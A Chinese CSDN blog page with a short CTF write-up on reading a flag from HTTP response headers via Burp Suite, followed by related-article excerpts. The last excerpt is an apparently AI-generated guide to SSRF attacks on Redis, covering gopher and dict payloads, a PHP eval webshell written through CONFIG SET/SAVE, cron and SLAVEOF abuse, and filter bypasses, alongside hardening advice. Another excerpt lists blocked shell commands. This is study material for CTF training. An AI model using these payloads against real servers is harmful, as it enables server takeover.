CTF-服务器返回数据查看

最新推荐文章于 2025-08-01 09:39:27 发布

原创最新推荐文章于 2025-08-01 09:39:27 发布 · 989 阅读

0 ·

CC 4.0 BY-SA版权

墨者学院专栏收录该内容

100 篇文章

订阅专栏

靶场地址：
https://www.mozhe.cn/bug/detail/bnlGb1NrcElqc1RlQVV3VDhXVXA5dz09bW96aGUmozhe
根据题意
在这里插入图片描述
回答页面中的问题，使用burp suite抓包，找到页面返回的Response Headers数据内容

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Jimmy22

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctf-web

weixin_43150428的博客

11-04

3008

ctf-web 信息搜集认证绕过 SQL注入文件上传文件包含 PHP代码审计信息搜集源码泄露页面源代码敏感文件泄漏备份文件(.swp/.bak/.beifen/~/phps等) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)] 数据库(mdb) 压缩包(zip/tar.gz//DS_Stor

【CTF-SHOW】 web入门 web11-域名隐藏信息【详-域名】

2302_79596028的博客

10-13

1931

域名（Domain Name）是互联网上用来标识网站或网络服务的名字，它是一个人类易于记忆和使用的地址，用于代替复杂的IP地址。在互联网中，设备（如服务器）通过IP地址进行通信，但IP地址是数字的，不容易记忆，所以域名系统（DNS）出现了。www.example.com 映射为对应的IP地址例如：192.0.2.1顶级域名（TLD）：例如.com、.org、.net等。二级域名：例如example.com中的example。子域名：例如www.example.com中的www。

参与评论您还未登录，请先登录后发表或查看评论

ctf web中快速反弹

wssmiss的博客

03-25

670

**原文：**https://ciphersaw.me/2017/12/16/详解 CTF Web 中的快速反弹 POST 请求/ 原文作者:Cipher Saw 0x00 前言在 CTF Web 的基础题中，经常出现一类题型：在 HTTP 响应头获取了一段有效期很短的 key 值后，需要将经过处理后的 key 值快速 POST 给服务器，若 key 值还在有效期内，则服务器返回最终的 flag...

CTF-数据分析（十一）

→_→

08-11

1022

声明：以下CTF题均来自网上收集，在这里主要是给新手们涨涨见识，仅供参考而已。需要题目数据包的请私信或在下方留言。 21.数据包分析- No_Big_Deal （来源：google-ctf-2016） 1.关卡描述有时答案很明显，有时会被掩盖。找到答案下载附件并从中获取flag值进行提交。 2.解题步骤 2.1 点击题目查看描述并下载附，在kali中执行strings no-big-deal.pcap| egrep "....

啥是CTF？新手如何入门CTF？

最新发布

m0_56146626的博客

08-01

605

CTF 是 Capture The Flag 的简称，中文咱们叫夺旗赛，其本意是西方的一种传统运动。在比赛上两军会互相争夺旗帜，当有一方的旗帜已被敌军夺取，就代表了那一方的战败。在信息安全领域的 CTF 是说，通过各种攻击手法，获取服务器后寻找指定的字段，或者文件中某一个固定格式的字段，这个字段叫做 flag，其形式一般为 flag{xxxxxxxx}，提交到裁判机就可以得分。

【CTF-Misc】GPS数据处理：WriteUp of “CatchCat”

hustle28214的博客

12-29

1717

以一道夺旗题分享一个python3处理GPS数据的方式。

CTF入门题目web响应头的获取

shallon686的博客

09-24

585

http://172.22.2.211:8005/这是目标网站首先打开，目的是获取响应头文件首先通过网页的审查元素查看网页源代码也是很皮，用描述语句迷惑性十足废话不多说直接找响应头文件，刷新下网页得到Flag FLAG:WYE{Really_check_in} ...

墨者学院-入门级-服务器返回数据查看-小白必看（超详细）

kitiu666的博客

08-03

1491

2020年8月3日，第二次网络安全试验。本实验较简单，不需要用到任何抓包工具，但还是想写写，当个记录。准备需要： 1.window电脑 1.进入靶场，一个选择题，答对和答错都会出现弹框。但我们看不出key在哪，因为key隐藏在了弹框的返回包中。 2.按F12，选择Network，然后再提交一次答案，这时候就会出现两个文件包，我们进入第219.153.49.228的文件。 3.打开后，寻找key，找到后复制，粘贴就成功了。实验超简单，是超，但这也启示我们看看数据不要只看表面，有些信息或许被隐藏

SQLi-CTF-master.zip

04-09

在SQL注入攻击中，攻击者可以向应用程序输入恶意的SQL代码，以篡改数据库查询、获取未经授权的数据，甚至完全控制数据库服务器。以下是一些关于SQL注入的关键知识点： 1. **类型分类**： - **错误回显型**：攻击者...

CTF-Web学习笔记：SQL注入篇

Deng7326的博客

07-28

1151

本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因，即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型，包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验：如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目，详细演示了从数据库名获取到最终拿Flag的完整解题流程，并推荐了SQLiLabs等练习平台。

CTF-Web学习笔记：服务端请求伪造（SSRF）篇

Deng7326的博客

07-29

1235

本文系统介绍了CTF比赛中SSRF漏洞的攻防技术。首先解析了SSRF的核心原理，即利用服务器对用户输入URL的未校验缺陷，诱导其访问内网资源。然后详细分析了5类常见CTF题型：文件读取、内网探测、云服务元数据窃取、协议绕过及组合漏洞利用。重点讲解了绕过URL过滤、利用特殊协议（如dict://、gopher://）等实战技巧，并通过一道SSRF+Redis的高阶题目演示完整攻击链。最后给出防御建议：严格校验输入URL、禁用危险协议、实施内网隔离等。

极客大挑战2019的"服务端检测系统"

silence1_的博客

11-17

836

极客大挑战的"服务端检测系统" 这道题没做出来，看来writeup之后发现是因为自己基础知识不足。这里补一下。关于HTTP头的一些小知识 http头的格式：请求方法 /路径 HTTP/版本头字段: 值比如： GET /index.php HTTP/1.1 Host: 127.0.0.1 http头部的各个字段之间用CRLF(\r\n)(%0d%0a)分割 http请求头(响应头)...

ctf-攻防世界-web：cookie

一只菜鸟的博客

11-01

4597

提示在cookie里放了东西，那么就去查看cookie吧。F12打开开发者工具，在储存里有名为look-here，值为cookie.php的cookie 访问cookie.php，提示See the http response，即查看http返回包。在开发者工具的网络一栏查看cookie.php，即可发现flag 或者用burp抓包，右键send to repeater 可查看返回包的headers发现flag ...

网络抓包与HTTP协议

YouthBlood9的博客

11-06

1679

嘿！我是目录一、Wireshark网络封包分析软件1.1 定义1.2 应用1.3 工作流程1.4 时标与过滤器二、Fiddler抓包工具2.1 定义2.2 工作原理三、TCP三次握手3.1步骤参考文献一、Wireshark网络封包分析软件 1.1 定义 Wireshark（前称Ethereal）：是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包，并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。在过去，网络封包分析软件是非常昂贵

学习打卡web

wuwuliuliu0524的博客

07-05

1301

合天网安实验室2022.7.5使用burp进行暴力破解打卡burp相当于在浏览器向服务器发出请求的中间端加了一层代理，发送的请求就会被截获burpsuite设置监听端口：burp：Proxy-Options，本地8080端口是默认选择的，可以另行添加Add本地：控制面板-网络和Internet-Internet选项-连接-局域网设置-代理服务器Proxy-Intercept-Intercept is on，然后开始访问网站，截获后点击forward，这个包就从代理发送给服务器，服务器返回的结果仍旧会被记录，

ctfshow刷题web入门--1--ljcsd

m0_74317362的博客

11-25

1997

cat flag 空格 [0-9] * more wget less head sort tail sed cut tac awk strings od curl nl scp rm ` % 制表符 & >

云演ctf-黑客帝国（附flag）

m0_62630794的博客

01-23

598

【代码】云演ctf-黑客帝国（附flag）

*CTF2022 oh-my-lotto&revenge

Sk1y的博客

04-27

560

*CTF2022 oh-my-lotto&revenge 文章目录*CTF2022 oh-my-lotto&revenge简单分析下源码lottoapp非预期解修改PATH变量WGETRC预期解参考链接简单分析下源码题目给了附件，主要看app,lotto,docker-compose.yml 这里是开了两个容器，然后通过links进行交互，app可以通过links将lotto容器的ip记录到该容器中, 再通过连接 lotto:80 可以访问lotto容器（因为lotto在80端口上）

CTF 三大测试靶场搭建：DVWA、SQLi-LABS、upload-labs 靶场部署教程（VM + CentOS 7 + Docker）

zatongtong的博客

01-18

3953

基于 CentOS 7 系统，利用 Docker 部署 DVWA、SQLi-LABS、upload-labs 靶场，靶场的初始化，Docker 基本使用

ctf-ssrf-redis

06-14

<think>我们正在讨论CTF比赛中与SSRF（Server-SideRequestForgery）和Redis相关的攻击或防御技巧。根据提供的引用，攻击者常利用SSRF漏洞通过特定的协议（如dict或gopher）与内网的Redis服务交互，进而实现未授权访问、写入Webshell或执行其他恶意操作。以下是相关的攻击技巧和防御方法的总结：###攻击技巧1.**利用dict协议攻击Redis**（引用[1]）：-通过SSRF发送dict协议的请求到Redis服务，可以执行Redis命令。-典型攻击步骤：-设置Redis的工作目录：`configsetdir/var/www/html`-设置保存的文件名：`configsetdbfilenamewebshell.php`-写入Webshell内容：`settest"<?php@eval($_POST['cmd']);?>"`（注意：这里的引号需要正确转义）-保存：`save`-这样就在Web目录下写入了webshell.php文件，攻击者可以通过蚁剑等工具连接。2.**利用gopher协议攻击Redis**（引用[2]）：-gopher协议功能更强大，可以发送多行命令。-使用工具（如gopherus）生成攻击payload：-生成Redis的payload：`./gopherus.py--exploitredis`-输入要执行的PHP代码（如`<?phpeval($_POST["123"]);?>`），生成gopher链接。-由于gopher协议在传输中需要正确编码，通常需要二次URL编码。-将生成的payload通过SSRF漏洞发送，即可在目标服务器上写入Webshell。3.**绕过过滤**（引用[3]）：-题目中可能过滤了`file://`、`dict`、`127.0.0.1`、`localhost`等关键词。-绕过方法：-使用IP的十进制表示（如`2130706433`代表`127.0.0.1`）或`0.0.0.0`。-使用DNS重绑定技术。-使用非标准端口或协议（如http协议访问Redis的6379端口，但Redis不支持HTTP，所以通常用gopher或dict）。-利用URL解析特性，如`http://abc@127.0.0.1`、`http://127.0.0.1:80@evil.com`等。###防御技巧1.**过滤输入**：-对用户输入的URL进行严格检查，禁止访问内网IP和特殊协议（如dict、gopher）。-使用正则表达式过滤，但要注意绕过技巧（如IP的多种表示形式）。2.**限制协议**：-只允许HTTP/HTTPS协议，禁止其他协议。3.**网络隔离**：-将关键服务（如Redis）置于内网，并设置防火墙规则，禁止外部访问。4.**Redis安全配置**：-为Redis设置强密码认证。-限制Redis的绑定IP（不要绑定在0.0.0.0）。-以低权限用户运行Redis，并限制其文件写入权限。5.**使用SSRF防护机制**：-在服务端设置请求的目标地址白名单。-使用DNS解析并验证目标IP是否在允许范围内。###示例：攻击Redis写入Webshell假设存在SSRF漏洞，且内网Redis无认证，攻击者可以构造如下dict协议的请求（注意空格和换行需要正确编码）：```dict://127.0.0.1:6379/configsetdir/var/www/htmldict://127.0.0.1:6379/configsetdbfilenameshell.phpdict://127.0.0.1:6379/settest"<?php@eval($_POST['cmd']);?>"dict://127.0.0.1:6379/save```但实际中，由于dict协议一次只能发送一个命令，且需要多个请求，因此通常使用gopher协议在一个请求中发送多个命令。###注意事项-在CTF中，Redis可能运行在非默认端口或需要绕过过滤。-写入Webshell的路径需要可写，且Web服务器能够解析。§§相关问题§§1.如何防御SSRF攻击Redis？2.在CTF中，如果过滤了dict和gopher协议，还有哪些方法可以利用SSRF攻击Redis？3.Redis除了写入Webshell，还可以利用SSRF进行哪些攻击？</think>### CTF SSRF Redis攻击与防御技巧在CTF比赛中，SSRF（服务端请求伪造）结合Redis的攻击是常见题型。以下是关键技巧总结： --- #### **攻击技巧（利用SSRF操作Redis）** 1. **协议利用** - **dict协议**：直接发送Redis命令（需URL编码） ```http dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html ``` - **gopher协议**（更强大）：支持多行命令，常用工具`gopherus`生成Payload ```python # 生成Payload示例（自动处理换行编码） ./gopherus.py --exploit redis ``` 2. **写入Webshell** - 经典四步操作： ```redis CONFIG SET dir /var/www/html # 设置保存目录 CONFIG SET dbfilename shell.php # 设置文件名 SET payload "<?php eval($_POST['cmd']);?>" # 写入恶意代码 SAVE # 保存到文件 ``` - 需注意特殊字符转义（如`<`需转为`<`） 3. **绕过过滤** - **IP绕过**：用`0.0.0.0`、`2130706433`（127.0.0.1的整数形式）或`localhost`替代 - **协议绕过**：若过滤`dict/gopher`，尝试`http://0.0.0.0:6379/?`（需Redis支持HTTP） - **分块编码**：对Payload二次URL编码（引用[2]示例） 4. **其他利用方式** - 写计划任务：`CONFIG SET dir /var/spool/cron/` - 主从复制攻击：通过`SLAVEOF`命令控制Redis从恶意服务器加载模块 - 读取敏感文件：`CONFIG GET *`获取Redis配置 --- #### **防御技巧** 1. **输入过滤** - 协议黑名单：禁用`file://`、`dict://`、`gopher://` - IP/域名限制：过滤`127.0.0.1`、`localhost`、内网IP段 - 正则强化：检测异常路径（如`/var/spool/cron`） 2. **Redis加固** ```bash # 关键配置 bind 127.0.0.1 # 只监听本地 requirepass "强密码" # 启用认证 rename-command CONFIG "" # 禁用危险命令 ``` 3. **服务隔离** - 将Redis部署在内网，禁止公网访问 - 使用防火墙限制6379端口的来源IP 4. **权限控制** - Redis以低权限用户运行（非root） - 限制Web目录写权限（防止写Shell） --- #### **CTF实战要点** 1. **判断Redis存在**：尝试访问`http://target:6379`若返回`-ERR wrong number of arguments`则存在。 2. **编码处理**： - 使用工具（如gopherus）自动生成编码后的Payload - 二次URL编码绕过WAF（引用[2]案例） 3. **回显利用**：若命令无回显，可通过延时或DNS外带数据判断执行结果。 > 参考案例：某CTF题通过SSRF的gopher协议发送Redis命令写入Webshell，最终用蚁剑连接获取flag（引用[2]）。 ---